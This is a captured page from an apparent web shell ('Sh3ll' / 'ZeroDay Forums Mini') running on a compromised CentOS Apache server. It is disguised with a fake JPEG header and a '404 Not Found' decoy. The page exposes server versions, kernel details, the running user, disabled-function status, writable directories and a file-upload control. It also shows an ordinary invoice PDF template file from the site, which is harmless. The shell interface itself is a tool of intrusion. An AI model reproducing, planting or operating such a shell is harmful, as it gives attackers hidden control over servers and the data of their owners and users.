����JFIF��� ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/adimi/application/modules/dashboard/views/store_invoice/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/adimi/application/modules/dashboard/views/store_invoice/invoice_pdf.php
<?php

date_default_timezone_set(DEF_TIMEZONE);
 $date = date('Y-m-d'); ?>
<!-- Invoice pdf start -->
<link href="<?php echo MOD_URL.'dashboard/assets/css/pdf.css'; ?>" rel="stylesheet" type="text/css"/>
<table class="table">
	<thead>
		{company_info}
		<tr>
			<th colspan="9"><center><h2> {company_name}</h2></center></th>
		</tr>
		<tr>
			<th colspan="9"><center>{address}</center></th>
		</tr>
		<tr>
			<th colspan="9"><center>PHONE : {mobile}</center></th>
		</tr>
		{/company_info}
		<tr>
			<th colspan="3">&nbsp;</th>
			<th colspan="3"><span class="memo">MEMO</span></th>
			<th colspan="3"><?php 
$s = date("M-d-Y g:i:s A", time());  ?></th>
		</tr>
		<tr>
			<th>Date </th>
			<th>:</th>
			<th><?php echo $date; ?></th>
			<th colspan="3" class="text-right">Invoice No &nbsp; : &nbsp; {invoice_no}</th>
			<th colspan="3" class="text-right">Memo No &nbsp; : &nbsp; {invoice_id}</th>
		</tr>
		<tr>
			<th>Customer Name </th>
			<th>:</th>
			<th colspan="7" class="text-left">{customer_name}</th>
		</tr>
		<tr>
			<th >Address </th>
			<th>:</th>
			<th colspan="7" class="text-left">{customer_address}</th>
		</tr>

	</thead>
</table>
<table border="1" width="100%" class="tbl_pdf">
	<thead>
		<tr>
			<th>Sl</th>
			<th>Item Information</th>
			<th>Total Quantity</th>
			<th>Rate</th>
			<th>Amount</th>
		</tr>
	</thead>
	<tbody>
	{invoice_all_data}
		<tr>
			<td>{sl}</td>
			<td>{product_name}&nbsp; &nbsp; {product_model}</td>
			<td>{quantity}</td>
			<td>{rate}</td>
			<td>{total_price}</td>
		</tr>
	{/invoice_all_data}
	</tbody>
	<tfoot>
		<tr>
			<td>&nbsp;</td>
			<td class="text-right"><b>Grand total:</b></td>		
			<td><b>{subTotal_quantity}</b></td>		
			<td>&nbsp;</td>			
			<td class="text-right"><b>{total_amount}</b></td>
		</tr>
	</tfoot>
</table>

<table border="0" width="97%" class="tbl_pdf2">
	<thead>
		<tr>
			<th>
				<div  class="prepared_by">
					Prepared By
				</div>
			</th>
			<th>
				<div  class="prepared_by">
					Received By
				</div>
			</th>
			<th>
				<div  class="prepared_by">
					Checked By
				</div>
			</th>
			<th>
				<div  class="prepared_by">
					Authorised By
				</div>
			</th>
		</tr>
	</thead>
</table>
<!-- Invoice pdf end -->

ZeroDay Forums Mini